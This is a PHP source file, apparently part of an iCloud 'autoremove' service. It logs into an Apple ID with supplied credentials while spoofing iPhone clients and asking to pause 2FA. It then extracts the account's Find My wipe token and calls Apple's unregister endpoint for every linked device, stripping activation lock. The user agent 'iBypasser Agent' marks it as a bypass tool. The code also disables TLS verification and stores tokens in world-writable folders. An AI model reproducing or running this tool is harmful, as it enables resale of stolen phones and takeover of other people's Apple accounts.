
<?php
require_once 'utils/PlistParser.php';

/**
 * Adaptación de ICloudAPI para compatibilidad con autoremove.php
 */
class API {
    
    // Constantes
    private const LOG_MAX_SIZE = 1048576; // 1MB
    private const API_BASE_PATH = '/Silent_API/';
    
    // Headers por defecto
    private array $defaultHeaders = [
        'Origin: https://www.icloud.com ',
        'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 ',
        'Content-Type: text/plain ',
        'Accept: */*',
        'Referer: https://www.icloud.com/ ',
        'Accept-Encoding: gzip, deflate ',
        'Accept-Language: en-US,en;q=0.8 ',
    ];
    
    // Propiedades privadas
    private array $cookies = [];
    private array $headers;
    private string $username = "";
    private string $password = "";
    private string $server = "";
    private string $ownerAppleId = "";
    private string $ownerName = "";
    
    public function __construct() {
        $this->headers = $this->defaultHeaders;
    }
    
    /**
     * Método principal compatible con autoremove.php
     */
    public function start_remove(string $username, string $password, bool $autoremove = false): array {
        $this->username = $username;
        $this->password = $password;
        
        try {
            // Preparar directorio de trabajo
            $workingDir = $this->prepareWorkingDirectory($username);
            
            // Proceso de autenticación completo
            if (!$this->performFullAuthentication($username, $password, $workingDir)) {
                return [
                    'status' => 401,
                    'success' => false,
                    'msg' => 'Authentication failed',
                    'device_list' => []
                ];
            }
            
            // Procesar dispositivos
            $devices = $this->processDevices($username, $workingDir);
            
            if (empty($devices)) {
                return [
                    'status' => 404,
                    'success' => true,
                    'msg' => 'No devices found',
                    'device_list' => []
                ];
            }
            
            return [
                'status' => 200,
                'success' => true,
                'msg' => 'Devices processed',
                'username' => $username,
                'device_list' => $this->formatDevicesForAutoremove($devices)
            ];
            
        } catch (Exception $e) {
            $this->logError("Process error: " . $e->getMessage(), $username);
            
            return [
                'status' => 500,
                'success' => false,
                'msg' => 'Processing failed: ' . $e->getMessage(),
                'device_list' => []
            ];
        }
    }
    
    /**
     * Convierte dispositivos al formato esperado por autoremove.php
     */
    private function formatDevicesForAutoremove(array $devices): array {
        $formattedDevices = [];
        
        foreach ($devices as $device) {
            $statusData = json_decode($device['Status'], true);
            $isRemoved = isset($statusData['statusCode']) && $statusData['statusCode'] == '200';
            
            $formattedDevices[] = [
                'model' => $device['modelDisplayName'] ?? $device['model'] ?? 'Unknown',
                'device_name' => $device['name'] ?? 'Unknown Device',
                'lost_mode' => 'No', // iCloud API no proporciona info de lost mode en este contexto
                'owner_lostmode_msg' => '',
                'owner_number' => '',
                'owner_lostmode_email' => '',
                'msg' => $isRemoved ? 'Removed' : 'Failed',
                'imei' => $device['imei'] ?? '-',
                'serial' => $device['serialNumber'] ?? '-',
                'udid' => $device['udid'] ?? '-',
                
                // Campos adicionales compatibles con formato original
                'devicePicture' => $device['modelLargePhotoURL2x'] ?? '',
                'deviceName' => $device['name'] ?? 'Unknown Device',
                'deviceModel' => $device['modelDisplayName'] ?? $device['model'] ?? 'Unknown',
                'deviceIMEI' => $device['imei'] ?? '-',
                'deviceSerial' => $device['serialNumber'] ?? '-',
                'deviceiCloudMode' => 0,
                'activationLocked' => 'Unknown',
                'isRemoved' => $isRemoved,
                'removeFailReason' => $isRemoved ? null : 'Unregister failed'
            ];
        }
        
        return $formattedDevices;
    }
    
    /**
     * Prepara el directorio de trabajo
     */
    private function prepareWorkingDirectory(string $appleId): string {
        $dirPath = __DIR__ . self::API_BASE_PATH . $appleId;
        
        if (!file_exists($dirPath)) {
            mkdir($dirPath, 0777, true);
        } else {
            $this->cleanDirectory($dirPath);
        }
        
        return $dirPath;
    }
    
    /**
     * Limpia archivos del directorio
     */
    private function cleanDirectory(string $dirPath): void {
        $files = glob("$dirPath/*.*");
        if ($files !== false) {
            array_map('unlink', $files);
        }
    }
    
    /**
     * Realiza el proceso completo de autenticación
     */
    private function performFullAuthentication(string $appleId, string $password, string $workingDir): bool {
        // Paso 1: Autenticación inicial
        if (!$this->authenticateInitial($appleId, $password, $workingDir)) {
            $this->logError("Initial authentication failed", $appleId);
            return false;
        }
        
        // Paso 2: Login web
        if (!$this->performWebLogin($appleId, $password)) {
            $this->logError("Web login failed", $appleId);
            return false;
        }
        
        // Paso 3: Obtener detalles de dispositivos
        if (!$this->fetchDeviceDetails($appleId)) {
            $this->logError("Failed to fetch device details", $appleId);
            return false;
        }
        
        return true;
    }
    
    /**
     * Autenticación inicial con iCloud
     */
    private function authenticateInitial(string $appleId, string $password, string $workingDir): bool {
        $url = 'https://setup.icloud.com/setup/fmipauthenticate/' . $appleId;
        $postData = json_encode([
            "clientContext" => [
                "productType" => "iPhone9,1",
                "buildVersion" => "376",
                "appName" => "FindMyiPhone",
                "osVersion" => "13.1.3",
                "appVersion" => "3.0",
                "clientTimestamp" => 507669952542,
                "inactiveTime" => 1,
                "deviceUDID" => "df9b79e42663ff87ccb4023c155b272e293f20f4"
            ],
            "serverContext" => new stdClass()
        ]);
        
        $authHeader = base64_encode($appleId . ':' . $password);
        $headers = [
            "Host: setup.icloud.com",
            "Accept: */*",
            "Authorization: Basic " . $authHeader,
            "Proxy-Connection: keep-alive",
            "X-MMe-Country: EC",
            "X-MMe-Client-Info: <iPhone7,2> <iPhone OS;8.1.2;12B440> <com.apple.AppleAccount/1.0 (com.apple.Preferences/1.0)>",
            "Accept-Language: es-es",
            "Content-Type: text/plist",
            "Connection: keep-alive"
        ];
        
        $response = $this->sendCurlRequest($url, $postData, $headers, "Ajustes/1.0 CFNetwork/711.1.16 Darwin/14.0.0");
        
        if ($response !== false) {
            file_put_contents("$workingDir/dat.plist", $response);
            return true;
        }
        
        return false;
    }
    
    /**
     * Obtiene el token de autenticación web
     */
    private function getWebAuthToken(): string|false {
        $headers = [
            'Host: idmsa.apple.com.cn',
            'Accept: application/json, text/javascript, */*; q=0.01',
            'Accept-Language: uk,ru;q=0.8,en-US;q=0.5,en;q=0.3',
            'Accept-Encoding: gzip, deflate, br',
            'Content-Type: application/json',
            'X-Apple-Widget-Key: d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d',
            'X-Requested-With: XMLHttpRequest',
            'Connection: keep-alive',
            'X-Forwarded-For: 192.168.1.100',
        ];
        
        $url = 'https://idmsa.apple.com.cn/appleauth/auth/signin';
        $postData = json_encode([
            "accountName" => $this->username,
            "password" => $this->password,
            "rememberMe" => false,
            "trustTokens" => [],
            "pause2FA" => true
        ]);
        
        $response = $this->sendWebRequest($url, $postData, $headers, 'POST');
        
        if ($response === false) {
            return false;
        }
        
        $responseHeaders = $this->parseHeaders($response[0]);
        
        if (isset($responseHeaders['x-apple-session-token'])) {
            $token = trim(str_replace("X-Apple-Session-Token:", "", $responseHeaders['x-apple-session-token']));
            return $token;
        }
        
        return false;
    }
    
    /**
     * Realiza el login web con iCloud
     */
    private function performWebLogin(string $appleId, string $password): bool {
        $webAuthToken = $this->getWebAuthToken();
        if ($webAuthToken === false) {
            return false;
        }
        
        return $this->completeAccountLogin($webAuthToken, $appleId);
    }
    
    /**
     * Completa el login de la cuenta
     */
    private function completeAccountLogin(string $webAuthToken, string $appleId): bool {
        $url = "https://setup.icloud.com/setup/ws/1/accountLogin";
        $data = json_encode([
            "dsWebAuthToken" => $webAuthToken,
            "extended_login" => false
        ]);
        
        $response = $this->sendPostRequest($url, $data);
        
        if ($response === false) {
            return false;
        }
        
        $result = json_decode($response[0], true);
        
        if (json_last_error() !== JSON_ERROR_NONE) {
            return false;
        }
        
        if (isset($result["error"])) {
            return false;
        }
        
        if (isset($result["domainToUse"])) {
            $domain = strtolower($result["domainToUse"]);
            $this->headers[0] = "Origin: https://www.$domain ";
            return $this->completeAccountLogin($webAuthToken, $appleId);
        }
        
        // Configurar datos de respuesta exitosa
        $this->setupSuccessfulLogin($result, $response[1], $appleId);
        return true;
    }
    
    /**
     * Configura los datos después de un login exitoso
     */
    private function setupSuccessfulLogin(array $result, string $responseHeaders, string $appleId): void {
        $this->ownerAppleId = $result['dsInfo']['appleId'];
        $this->ownerName = $result['dsInfo']['fullName'];
        $this->server = $result["webservices"]["findme"]["url"];
        
        // Extraer y configurar cookies
        $this->extractAndSetCookies($responseHeaders, $appleId);
    }
    
    /**
     * Extrae y configura las cookies de la respuesta
     */
    private function extractAndSetCookies(string $responseHeaders, string $appleId): void {
        preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $responseHeaders, $matches);
        $cookieString = "";
        
        foreach ($matches[0] as $cookieValue) {
            $cleanValue = str_replace("Set-Cookie: ", "", $cookieValue);
            $cookieString .= $cleanValue . "; ";
            
            $parts = explode("=", $cleanValue, 2);
            if (count($parts) === 2) {
                $this->cookies[$parts[0]] = $parts[1];
            }
        }
        
        $this->headers[6] = "Cookie: " . $cookieString;
    }
    
    /**
     * Obtiene los detalles de los dispositivos
     */
    private function fetchDeviceDetails(string $appleId): bool {
        $workingDir = __DIR__ . self::API_BASE_PATH . $appleId;
        $url = "https://p38-setup.icloud.com/setup/web/device/getDevices?";
        
        $response = $this->sendPostRequest($url, "");
        
        if (empty($response[0])) {
            return false;
        }
        
        $responseData = json_decode($response[0]);
        
        if (json_last_error() !== JSON_ERROR_NONE) {
            return false;
        }
        
        // Guardar respuesta formateada
        $this->saveDeviceDetails($responseData, $workingDir, $appleId);
        
        return isset($responseData->devices);
    }
    
    /**
     * Guarda los detalles de dispositivos en archivo
     */
    private function saveDeviceDetails(object $responseData, string $workingDir, string $appleId): void {
        $responseString = json_encode($responseData, JSON_PRETTY_PRINT);
        $responseString = str_replace('\\/', '/', $responseString);
        
        $plistFile = "$workingDir/devices.plist";
        file_put_contents($plistFile, $responseString);
    }
    
    /**
     * Procesa todos los dispositivos para desregistro
     */
    private function processDevices(string $appleId, string $workingDir): array {
        // Parsear archivo de autenticación
        $authData = $this->parseAuthenticationData($workingDir, $appleId);
        if (!$authData) {
            throw new Exception('Failed to parse authentication data');
        }
        
        // Cargar dispositivos
        $devices = $this->loadDevices($workingDir);
        if (!$devices) {
            return [];
        }
        
        $results = [];
        
        foreach ($devices as $device) {
            $deviceResult = $this->processSingleDevice($device, $authData, $workingDir);
            $results[] = $deviceResult;
        }
        
        return $results;
    }
    
    /**
     * Parsea los datos de autenticación del archivo plist
     */
    private function parseAuthenticationData(string $workingDir, string $appleId): array|false {
        if (!class_exists('PlistParser')) {
            $this->logError('PlistParser class not found', $appleId);
            return false;
        }
        
        $plistParser = new PlistParser();
        $parsedResponse = $plistParser->plistToArray("$workingDir/dat.plist");
        
        if (!isset($parsedResponse['appleAccountInfo']['dsid']) || 
            !isset($parsedResponse['tokens']['mmeFMIPWipeToken'])) {
            $this->logError('Failed to extract authentication tokens', $appleId);
            return false;
        }
        
        $dsid = $parsedResponse['appleAccountInfo']['dsid'];
        $wipeToken = $parsedResponse['tokens']['mmeFMIPWipeToken'];
        
        // Guardar tokens en archivos separados
        file_put_contents("$workingDir/dsid.txt", $dsid);
        file_put_contents("$workingDir/wipe.txt", $wipeToken);
        
        return [
            'dsid' => $dsid,
            'wipeToken' => $wipeToken
        ];
    }
    
    /**
     * Carga la lista de dispositivos
     */
    private function loadDevices(string $workingDir): array|false {
        $plistFile = "$workingDir/devices.plist";
        
        if (!file_exists($plistFile)) {
            return false;
        }
        
        $plistContent = file_get_contents($plistFile);
        $deviceData = json_decode($plistContent);
        
        return $deviceData->devices ?? false;
    }
    
    /**
     * Procesa un dispositivo individual
     */
    private function processSingleDevice(object $device, array $authData, string $workingDir): array {
        $udid = $device->udid;
        $unregisterResult = $this->unregisterDevice($authData['dsid'], $authData['wipeToken'], $udid);
        
        return [
            'modelLargePhotoURL2x' => $device->modelLargePhotoURL2x ?? null,
            'name' => $device->name ?? null,
            'osVersion' => $device->osVersion ?? null,
            'serialNumber' => $device->serialNumber ?? null,
            'modelDisplayName' => $device->modelDisplayName ?? null,
            'model' => $device->model ?? null,
            'imei' => $device->imei ?? null,
            'udid' => $device->udid ?? null,
            'mmeFMIPWipeToken' => $authData['wipeToken'],
            'Status' => $unregisterResult ? '{"statusCode":"200"}' : '{"statusCode":"500"}'
        ];
    }
    
    /**
     * Desregistra un dispositivo específico
     */
    private function unregisterDevice(string $dsid, string $wipeToken, string $udid): bool {
        $url = "https://p33-fmip.icloud.com/fmipservice/findme/$dsid/unregisterV2";
        
        $postData = json_encode([
            'serialNumber' => 'C8PVMLGYJC6G',
            'deviceContext' => ['deviceTS' => date('Y-m-d\TH:i:s\Z')],
            'deviceInfo' => [
                'productType' => 'iPhone8,1',
                'udid' => $udid,
                'fmipDisableReason' => 1,
                'buildVersion' => '19H349',
                'productVersion' => '15.7.6'
            ]
        ]);
        
        $authHeader = base64_encode($dsid . ':' . $wipeToken);
        
        $headers = [
            "Host: p33-fmip.icloud.com",
            "Accept-Language: es-es",
            "X-Apple-PrsId: " . $dsid,
            "Accept: */*",
            "Content-Type: application/json",
            "X-Apple-Find-API-Ver: 6.0",
            "X-Apple-I-MD-RINFO: 17106176",
            "Connection: keep-alive",
            "Authorization: Basic " . $authHeader,
            "Content-Length: " . strlen($postData),
            "X-Apple-Realm-Support: 1.0"
        ];
        
        $response = $this->sendCurlRequest($url, $postData, $headers, "FMDClient/6.0 iPhone9,3/13G36");
        
        if ($response !== false) {
            $responseDecoded = json_decode($response, true);
            return isset($responseDecoded['statusCode']) && $responseDecoded['statusCode'] == '200';
        }
        
        return false;
    }
    
    // Métodos de utilidad (sendPostRequest, sendWebRequest, sendCurlRequest, etc.)
    // Se mantienen igual que en el código original...
    
    private function sendPostRequest(string $url, string $data): array|false {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_POST => true,
            CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
            CURLOPT_HTTPHEADER => $this->headers,
            CURLOPT_POSTFIELDS => $data,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_ENCODING => 'UTF-8',
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_VERBOSE => false,
            CURLOPT_TIMEOUT => 60
        ]);
        
        $result = curl_exec($ch);
        
        // Obtener respuesta con headers
        curl_setopt($ch, CURLOPT_HEADER, true);
        $resultWithHeaders = curl_exec($ch);
        
        curl_close($ch);
        
        if ($result === false) {
            return false;
        }
        
        return [$result, $resultWithHeaders];
    }
    
    private function sendWebRequest(string $url, string $data = '', array $headers = [], string $method = 'GET'): array|false {
        $ch = curl_init($url);
        
        curl_setopt_array($ch, [
            CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
            CURLOPT_SSL_VERIFYHOST => 0,
            CURLOPT_SSL_VERIFYPEER => 0,
            CURLOPT_HTTPHEADER => $headers,
            CURLOPT_USERAGENT => 'iBypasser Agent',
            CURLOPT_CUSTOMREQUEST => $method,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_HEADER => true,
            CURLOPT_TIMEOUT => 60
        ]);
        
        if (strtoupper($method) === 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        
        $result = curl_exec($ch);
        curl_close($ch);
        
        if ($result === false) {
            return false;
        }
        
        return [$result];
    }
    
    private function sendCurlRequest(string $url, string $postData, array $headers, string $userAgent): string|false {
        $ch = curl_init();
        
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_TIMEOUT => 60,
            CURLOPT_HTTPHEADER => $headers,
            CURLOPT_SSL_VERIFYPEER => 0,
            CURLOPT_SSL_VERIFYHOST => 0,
            CURLOPT_USERAGENT => $userAgent,
            CURLOPT_POST => 1,
            CURLOPT_POSTFIELDS => $postData
        ]);
        
        $response = curl_exec($ch);
        curl_close($ch);
        
        return $response;
    }
    
    private function parseHeaders(string $response): array {
        $headers = [];
        $headerText = substr($response, 0, strpos($response, "\r\n\r\n"));
        
        foreach (explode("\r\n", $headerText) as $i => $line) {
            if ($i === 0) continue;
            
            if (strpos($line, ': ') !== false) {
                [$key, $value] = explode(': ', $line, 2);
                $headerKey = str_replace(' ', '_', strtolower($key));
                $headers[$headerKey] = "$key: $value";
            }
        }
        
        return $headers;
    }
    
    private function logError(string $message, string $appleId): void {
        $dirPath = __DIR__ . self::API_BASE_PATH . $appleId;
        
        if (!file_exists($dirPath)) {
            mkdir($dirPath, 0777, true);
        }
        
        $logFile = $dirPath . '/error_silent.log';
        
        if (file_exists($logFile) && filesize($logFile) > self::LOG_MAX_SIZE) {
            unlink($logFile);
        }
        
        $time = date("Y-m-d H:i:s");
        $logMessage = "[$time] $message" . PHP_EOL;
        
        file_put_contents($logFile, $logMessage, FILE_APPEND | LOCK_EX);
    }
}

?>